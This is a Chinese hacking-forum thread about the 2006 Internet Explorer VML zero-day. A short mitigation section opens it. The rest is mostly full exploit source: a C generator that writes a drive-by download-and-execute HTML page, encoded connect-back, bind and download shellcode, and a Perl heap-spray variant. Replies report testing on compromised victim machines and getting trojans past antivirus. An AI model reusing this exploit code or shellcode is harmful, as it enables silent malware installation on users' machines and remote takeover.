信息来源：邪恶八进制信息安全团队（www.eviloctal.com）


推荐优先使用gyzy老大修改的版本
http://forum.eviloctal.com/read-htm-tid-24858.html


一个最新的无补丁严重漏洞在今天被公布!
该漏洞存在于Windows的VML组件（用于在IE中显示矢量图），目前没有任何修补补丁。漏洞的攻击代码已经被发布，而且非常容易利用。最可能的攻击行为是在网页上放置木马，一旦用户访问该网页，将自动安装黑客的木马或者病毒，而用户不会收到任何警告。
简而言之，对于普通的XP系统用户，请看如下解决方法： 该漏洞目前尚无补丁，我们建议在微软发布补丁之前，至少采用如下方法之一来保护您的系统：
1、解除vgx.dll的注册：点击"开始"菜单，选择"运行"，在其中输入下面的命令：
regsvr32 -u "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"
然后点击"确定"，在随后出现的弹出窗口中点击"确定"按钮。
在微软发布补丁后，如果想恢复注册，只需再用上述方法运行下面的命令即可：
regsvr32 "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"
2、尽量使用非IE内核的网络浏览器，如Firefox、Opera等。
3、随时关注微软的最新补丁公告


漏洞影响
Microsoft Windows 2000 Service Pack 4

Microsoft Windows XP Service Pack 1 and Service Pack 2

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1

Microsoft Windows Server 2003 with SP1 for Itanium-based Systems Edition

Microsoft Windows Server 2003 x64 Edition

MS站上的解决办法
Disable VML support in IE

Microsoft Security Advisory (925568) suggests the following techinques to disable VML support in IE:


Un-register Vgx.dll on Windows XP Service Pack 1; Windows XP Service Pack 2; Windows Server 2003 and Windows Server 2003 Service Pack 1
Modify the Access Control List on Vgx.dll to be more restrictive
Configure Internet Explorer 6 for Microsoft Windows XP Service Pack 2 to disable Binary and Script Behaviors in the Internet and Local Intranet security zone


测试效果如下

11.GIF (14 KB)

2006-9-21 12:27

C:\Documents and Settings\zjg\桌面\新建文件夹\Debug>3
Windows VML Download Exec Exploit
Code by nop nop#xsec.org, Welcome to http://www.xsec.org

Usage: 3 <URL> [htmlfile]


C:\Documents and Settings\zjg\桌面\新建文件夹\Debug>3 http://127.0.0.1/test.exe
1.htm
[+] download url:http://127.0.0.1/test.exe
[+] exploit file:1.htm
[+] buff size 287 bytes
[+] exploit write to 1.htm success!

C:\Documents and Settings\zjg\桌面\新建文件夹\Debug>

生成的1.htm文件目前不被杀

On Windows XP SP2 systems the vulnerable component (VGX.DLL) is compiled with the /GS (Buffer Security Check) flag, making exploitation more difficult.
EXP在Windows XP SP2 下利用的难度大一点，主要是shellcode的问题，一些shellcode在Windows XP SP2 下运行会出错，哪位兄弟测试下下面这段代码能否运行于Windows XP SP2，如果不能的话就要考虑修改下shellcode

据下面几位老大的测试，可以确认这个漏洞在2000下可以利用

代码基于nop的基础上修改,这段shellcode代码就写在外面算了
#define   g_ip      "127.0.0.1"
#define   g_port      1981
//don&#39;t change the offset
#define   ip_offset   92
#define   port_offset   99
//shellcode default connect back to 127.0.0.1:1981
unsigned char sc_connect_back_for_all_ver[]=
/* ip offset: 71 + 21 = 92 */
/* port offset: 78 + 21 = 99 */
/* 21 bytes decode */
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
"\xe8\xed\xff\xff\xff"
/* 254 bytes shellcode, xor with 0xee */
"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
"\x84\xec\x11\xb8\xfe\x7d\x86\x91\xee\xee\xef\x86\xec\xee\xee\xdb"
"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";

   port = htons(g_port)^(u_short)0xeeee;
   ip = inet_addr(g_ip)^0xeeeeeeee;
   memcpy(&sc_connect_back_for_all_ver[port_offset], &port, 2);
   memcpy(&sc_connect_back_for_all_ver[ip_offset], &ip, 4);
   strcpy(sc,sc_connect_back_for_all_ver);

复制内容到剪贴板

代码:

/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : [url]http://www.xsec.org[/url]
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Complie : cl vml.c
* :
* Usage : d:\>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:\>vml [url]http://xsec.org/xxx.exe[/url] xxx.htm
* :
*
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

//注意：0x7Ffa4512是中文2k/xp/2k3通用的，建议使用0x7Ffa4512
//除非你要专门对2k测试

// Search Shellcode
unsigned char dc[] =
"\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39"
"\x3B\x75\xFB\x4B\x80\x33\xEE\x39\x73\xFC\x75\xF7\xFF\xD3";

// Shellcode Start
unsigned char dcstart[] =
"noop";

//关于下面有人说到的shellcode的问题，我在这里考虑换段shellcode
另外给出几段shellcode供测试
   //shellcode, 开放 TCP 8721端口
/*   "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
   "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
   "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
   "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
   "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
   "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
   "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
   "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
   "\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
   "\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
   "\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
   "\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
   "\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
   "\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
   "\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
   "\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
   "\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
   "\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
   "\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
   "\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
   "\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
   "\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
   "\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
   "\x04\x31\xdb\x53\xff\xd0" */

/*另外一段
The length of encoded shellcode is :418
The new Encoded shellcodeD is:

"\xeb\x16\x5a\x4a\x33\xc9\x8b\xc1\x66\xb9\xa2\x1\x66\x8b\xc1\x80"
"\x34\x2\x99\x48\xe2\xf9\xeb\x5\xe8\xe5\xff\xff\xff"

"\x72\x8a\xcf"
"\xaa\x59\xfd\x12\xd9\xa9\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91"
"\xc7\x5a\x72\xfa\xf9\x12\xf5\xbd\xbd\x12\xdc\xa5\x12\xcd\x9c\xe1"
"\x9a\x4c\x12\xd3\x81\x12\xc3\xb9\x9a\x44\x7a\xad\xd0\x12\xad\x12"
"\x9a\x6c\xaa\x66\xaa\x59\x65\x35\x1d\x59\xed\x9e\x58\x5e\x8a\x9a"
"\x61\x72\x6d\xa2\xe5\xbd\xb1\xec\x78\x12\xc3\xbd\x9a\x44\xff\x12"
"\x95\xd2\x12\xc3\x85\x9a\x44\x12\x9d\x12\x9a\x5c\x10\xdd\xbd\x85"
"\xf8\x5a\x34\xc9\xcb\x71\x33\x66\x66\x66\x10\x9e\x1a\x5d\x91\x1a"
"\x5e\x9d\xa2\x68\xec\x75\x5a\x72\x98\x55\xcc\x12\x75\x1a\x5d\x45"
"\x72\xcd\xaa\x59\xc9\x66\xcc\x71\x50\x5a\xf1\xed\xed\xe9\xa3\xc5"
"\xc5\xa8\xab\xae\xb7\xa9\xb7\xa9\xb7\xa8\xc5\xa8\xb7\xfc\xe1\xfc"
"\x99\x99\x99\x99\x99\x99\x99\x8b\x99\x9e\x99\xd7\x98\x95\x99\x41"
"\x97\xa4\x99\x81\x96\xa4\x99\xc1\x96\xa4\x17\xd7\x97\x75\x34\x40"
"\x9c\x57\xeb\x67\x2a\x8f\xe7\x41\x7b\xea\xbc\x29\x66\x5b\x74\x42"
"\x75\x61\xaf\x83\xb6\xe9\x72\x9b\x72\x9c\x71\x60\x66\x66\x66\xc7"
"\x18\x77\xcc\x99\x99\x99\x10\xec\x61\x18\x5f\xa9\x99\x99\x99\x71"
"\x92\x66\x66\x66\x12\x49\x14\xe4\x45\x12\x57\x1a\x58\x81\x71\xc6"
"\x66\x66\x66\x1a\x58\x9d\xc8\x21\x98\x98\xf6\xf7\x58\x61\x89\xc9"
"\xf1\xec\xeb\xf5\xf4\xcd\x66\xcc\x45\x12\x49\xc0\xc0\xc0\x71\xa6"
"\x66\x66\x66\xaa\x59\x67\x5d\xb2\x79\x10\xfc\x65\xc9\x66\xec\x65"
"\x66\xcc\x69\x9a\x5d\x12\x61\x21\x3a\x11\xf\x8\x6e\x49\x32\x21"
"\xe\x3\xa\x16\x6e\x49\x32\x21\x57\x50\x48\x3\x6e\x49\x32\xaa"
"\x59\xff\x21\xe1\xfc\x32\xaa\x59\xc9\xc9\x66\xec\x65\x66\xec\x61"
"\xf3\x99\x66\xcc\x6d\x1c\x59\x96\x1c\x8c\x66\x66\x66\xaa\x50\x28"
"\xcd\xb2\x78\x12\x65\xce\xaa\x59\x6a\x33\xc6\x5f\x9e\xdd\xaa\x59"
"\x14\xee\xdd\xcf\xce\xc9\xc9\xc9\xc9\xc9\xc9\x66\xec\x65\xc9\x66"
"\xcc\x7d\x6e\x49\xc9\x66\xaf\x66\xcc\x79\x70\x7a\x67\x66\x66";
*/
//the code is test [url]http://127.0.0.1/1.exe[/url]
//Encode=0x99 equal 153(dec)
//Use UrlMode
//The length of new encoded URL shellcode_D is:447 bytes
//以上代码来自于一个shellcode生成器，我没时间写完整的shellcode生成代码了，所以通用程序就暂时搁置吧，不过自己改改代码，写个自己临时使用的代码应该没问题了，哪位兄弟有时间就写个更加完美的版本吧


//下面这段shellcode是nop原来的，有人说有问题，可以换成其他的shellcode试试
// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =
"\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65"
"\x9E\xF2\x43\x65\x86\xE6\x65\x19\x84\xEA\xB7\x06\xAB\xEE\xEE\xEE"
"\x0C\x17\x86\x81\x80\xEE\xEE\x86\x9B\x9C\x82\x83\xBA\x11\xF8\x7B"
"\x06\xDE\xEE\xEE\xEE\x6D\x02\xCE\x65\x32\x84\xCE\xBD\x11\xB8\xEA"
"\x29\xEA\xED\xB2\x8F\xC0\x8B\x29\xAA\xED\xEA\x96\x8B\xEE\xEE\xDD"
"\x2E\xBE\xBE\xBD\xB9\xBE\x11\xB8\xFE\x65\x32\xBE\xBD\x11\xB8\xE6"
"\x84\xEF\x11\xB8\xE2\xBF\xB8\x65\x9B\xD2\x65\x9A\xC0\x96\xED\x1B"
"\xB8\x65\x98\xCE\xED\x1B\xDD\x27\xA7\xAF\x43\xED\x2B\xDD\x35\xE1"
"\x50\xFE\xD4\x38\x9A\xE6\x2F\x25\xE3\xED\x34\xAE\x05\x1F\xD5\xF1"
"\x9B\x09\xB0\x65\xB0\xCA\xED\x33\x88\x65\xE2\xA5\x65\xB0\xF2\xED"
"\x33\x65\xEA\x65\xED\x2B\x45\xB0\xB7\x2D\x06\xB8\x11\x11\x11\x60"
"\xA0\xE0\x02\x2F\x97\x0B\x56\x76\x10\x64\xE0\x90\x36\x0C\x9D\xD8"
"\xF4\xC1\x9E";

// Shellcode End
unsigned char dcend[] =
"n00p";

// HTML Header
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"<head>\n"
"<title>XSec.org</title>\n"
"<style>\n"
"v\\:* { behavior: url(#default#VML); }\n"
"</style>\n"
"</head>\n"
"<body>\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";

char * footer =
"\"/>\n"
"</v:rect>\n"
"</body>\n"
"</html>\n"
;

// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
   int i=0;
   unsigned int ncr = 0;

   for(i=0; i<size; i+=2)
   {
      ncr = (buf[i+1] << 8) + buf[i];

      fprintf(fp, "&#%d;", ncr);
   }
}

void main(int argc, char **argv)
{
   unsigned char buf[1024] = {0};
   unsigned char burl[255] = {0};
   int sc_len = 0;
   int psize = 0;
   int i = 0;

   unsigned int nop = 0x4141;
   DWORD jmp = 0xeb06eb06;

   if (argc < 2)
   {
      printf("Windows VML Download Exec Exploit\n");
      printf("Code by nop nop#xsec.org, Welcome to [url]http://www.xsec.org[/url]\n");
      //printf("!!! 0Day !!! Please Keep Private!!!\n");
      printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]);
      exit(1);
   }

   url = argv[1];
   if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) <
        10 || strlen(url) > MAXURL)
   {
      printf("[-] Invalid url. Must start with &#39;http://&#39;,&#39;ftp://&#39; and < %d bytes.\n", MAXURL);
      return;
   }

   printf("[+] download url:%s\n", url);

   if(argc >=3) file = argv[2];

   printf("[+] exploit file:%s\n", file);

   fp = fopen(file, "w+b");
   //fp = fopen(file, "w");
   if(!fp)
   {
      printf("[-] Open file error!\n");
      return;
   }

   // print html header
   fprintf(fp, "%s", header);
   fflush(fp);

   for(i=0; i<NOPSIZE; i++)
   {
      //fprintf(fp, "&#%d;", nop);
      fprintf(fp, "A");
   }

   fflush(fp);

   // print shellcode
   memset(buf, 0x90, sizeof(buf));
   //memset(buf, 0x90, NOPSIZE*2);

   memcpy(buf, &ret, 4);
   psize = 4+8+0x10;

   memcpy(buf+psize, dc, sizeof(dc)-1);
   psize += sizeof(dc)-1;

   memcpy(buf+psize, dcstart, 4);
   psize += 4;

   sc_len = sizeof(sc)-1;
   memcpy(buf+psize, sc, sc_len);
   psize += sc_len;


   // print URL
   memset(burl, 0, sizeof(burl));
   strncpy(burl, url, 60);

   for(i=0; i<strlen(url)+1; i++)
   {
      burl[i] = url[i] ^ 0xee;
   }

   memcpy(buf+psize, burl, strlen(url)+1);
   psize += strlen(url)+1;

   memcpy(buf+psize, dcend, 4);
   psize += 4;


   // print NCR
   convert2ncr(buf, psize);



   printf("[+] buff size %d bytes\n", psize);

   // print html footer
   fprintf(fp, "%s", footer);
   fflush(fp);

   printf("[+] exploit write to %s success!\n", file);
}

偶也生成了一个
不过运行后IE就直接关闭了.木马也没运行成功
换GreenBrowser也是直接关闭
在肉鸡里也是关闭..有的肉鸡提示错误..非法关闭..内存100%
谁还测试了..说下遇到的问题

本机测试环境WINXP+IE6.0
肉鸡win2003+IE6.0

我测试了
没成功
IE直接关闭的

引用:

这里是引用第[1 楼]的fhod于2006-09-21 12:52发表的：
偶也生成了一个
不过运行后IE就直接关闭了.木马也没运行成功

他那个Down&Exec的shellcode好像有点问题，换个即可。
补充：我指的Win2000下。

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

好象是针对2000的
找个2000的鸡试下

测试结果
2000也关闭了
比XP关闭的还要快些
shellcode问题么?

引用:

这里是引用第[6 楼]的fhod于2006-09-21 13:23发表的：
测试结果
2000也关闭了
比XP关闭的还要快些
shellcode问题么?

呵呵，你在Win2000下测试 http://www.xyzreg.net/ievml0day.html 看看有没效果~

引用:

这里是引用第[7 楼]的xyzreg于2006-09-21 13:57发表的：

呵呵，你在Win2000下测试 http://www.xyzreg.net/ievml0day.html 看看有没效果~

我的就是2000的,你的我成功了

引用:

这里是引用第[8 楼]的优格于2006-09-21 14:25发表的：

我的就是2000的

有效果没？看到计算器了吧？呵呵

WIN2003下测试失败！浏览器直接关闭，什么都没出现。

xp sp2环境下！

ＴＴ，ＩＥ６．０很快就关了！


测试都不成功

代码的注释中：
Complie : cl vml.c　　是什么意思啊？

引用:

这里是引用第[11 楼]的ewolfok于2006-09-21 15:59发表的：
xp sp2环境下！

ＴＴ，ＩＥ６．０很快就关了！


.......

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k
都是针对2000的吧，有没有针对xp sp2 的跳转地址？

DWORD ret = 0x7Ffa4512
这个是中文2k/xp/2k3通用的

又看到了一段Perl代码
本人不熟悉Perl，仅仅发出代码看看
没有能力修改

复制内容到剪贴板

代码:

#!/usr/bin/perl
#
# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP0-SP1 +
# Windows 2000 SP4)
#
# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
#
# [url]http://sf-freedom.blogspot.com[/url]
#
# For educational purpose only
#
# Note: This exploit is modified from Shirkdog&#39;s PoC
# ([url]http://www.milw0rm.com/exploits/2400[/url])
#
# I exploit the stack-based buffer overflow in the different manner because of
# the problem of shellcode. I use heap spraying technique to injection my
# shellcode in the heap. Because I can control EIP so I tell it to jump into
# the heap that contains shellcode ^-^
#
# This exploit tested on: Windows XP SP1 + IE6 SP1
#          Windows XP SP0 + IE6
#          Windows 2000 SP4 + IE6 SP1
#          Windows 2000 SP4 + IE6
#
# I will describe more implementation details at my blog in this weekend :)
#
# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2,
# This exploit is not success. The situation that overwrite to the location
# that eax point to is not occured, so I cannot use my techqniue
# "The Fake Cookie" that I use to break buffer overflow protection in
# Windows Server 2003 SP0 to bypass it. If anybody can break this protection
# with some techniques, plz share information :)
#

use strict;

# win32_bind LPORT = 5555 - Metasploit
my $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";

my $jscript =
"<script>\n" .
"shellcode = unescape(\"" . convert_shellcode($shellcode) ."\");\n" .
"bigblock = unescape(\"\%u9090\%u9090\");\n" .
"headersize = 20;\n" .
"slackspace = headersize+shellcode.length;\n" .
"while (bigblock.length<slackspace) bigblock+=bigblock;\n" .
"fillblock = bigblock.substring(0, slackspace);\n" .
"block = bigblock.substring(0, bigblock.length-slackspace);\n" .
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n" .
"memory = new Array();\n" .
"for (i=0;i<350;i++) memory[i] = block + shellcode;\n" .
"</script>";

my $header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n" .
"<head>\n" .
"<object id=\"VMLRender\" classid=\"CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E\">\n" .
"</object>\n" .
"<style>\n" .
"v\\:* { behavior: url(#VMLRender); }\n" .
"</style>\n" .
"</head>\n" .
$jscript .
"<body>\n" .
"<v:rect style=&#39;width:120pt;height:80pt&#39; fillcolor=\"red\">\n" ;

my $footer =
"</v:rect>\n" .
"</body>\n" .
"</html>";


my $body1 = "<v:fill method=\"" ;
my $body2 =
"\" angle=\"-45\"\n" .
"focus=\"100%\" focusposition=\".5,.5\" focussize=\"0,0\"\n" .
"type=\"gradientRadial\" />\n" .
"</v:rect>\n" .
"</body>\n" .
"</html>";

my $page = "\xff\xfe";   # magic number of M$ unicode file
my $c;

# header + body1
foreach $c (split //, ($header . $body1)) {
   $page = $page . $c . "\x00";
}

# padding + ret
$page = $page . "\x41\x00" x (256) . # padding
   "\x01\x0d\x0d\x0d" .   # writable memory
   "\x44\x44\x44\x44" .    # padding
   "\x0d\x0d\x0d\x0d";   # return address

# body2 + footer
foreach $c (split //, ($body2 . $footer)) {
   $page = $page . $c . "\x00";
}

open (IE_VML, ">", "exploit.html");

print IE_VML $page;

close IE_VML;

# This function copy from JSUnescape() code in Metasploit
sub convert_shellcode {
   my $data = shift;
   my $mode = shift() || &#39;LE&#39;;
   my $code = &#39;&#39;;
   
   # Encode the shellcode via %u sequences for JS&#39;s unescape() function
   my $idx = 0;
   
   # Pad to an even number of bytes
   if (length($data) % 2 != 0) {
      $data .= substr($data, -1, 1);
   }
   
   while ($idx < length($data) - 1) {
      my $c1 = ord(substr($data, $idx, 1));
      my $c2 = ord(substr($data, $idx+1, 1));   
      if ($mode eq &#39;LE&#39;) {
        $code .= sprintf(&#39;%%u%.2x%.2x&#39;, $c2, $c1);   
      } else {
        $code .= sprintf(&#39;%%u%.2x%.2x&#39;, $c1, $c2);   
      }
      $idx += 2;
   }
   
   return $code;
}

http://www.milw0rm.com/exploits/2408

对XP没作用
~~~
2000为什么有些可以
有些不可以
那的问题?

PERL 版本的好像被杀了！
个人觉得程序也有问题！　　用记事本打开里面是乱码！

测试笔头的，成功了。计算器弹出。

引用:

这里是引用第[0 楼]的zhuwg于2006-09-21 12:27发表的：[原创]又一匹烈马Internet Explorer VML Buffer Overflow Download Exec Exploit
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）


推荐优先使用gyzy老大修改的版本
http://forum.eviloctal.com/read-htm-tid-24858.html
.......

zhuwg,你在nop的站上是哪个马甲？？？？

一台2K肉鸡测试成功
。。。

xp sp2的没反映
。。。
继续测试其他环境

XP SP2下 IE6.0  出现错误
希望能出个XP下能成功的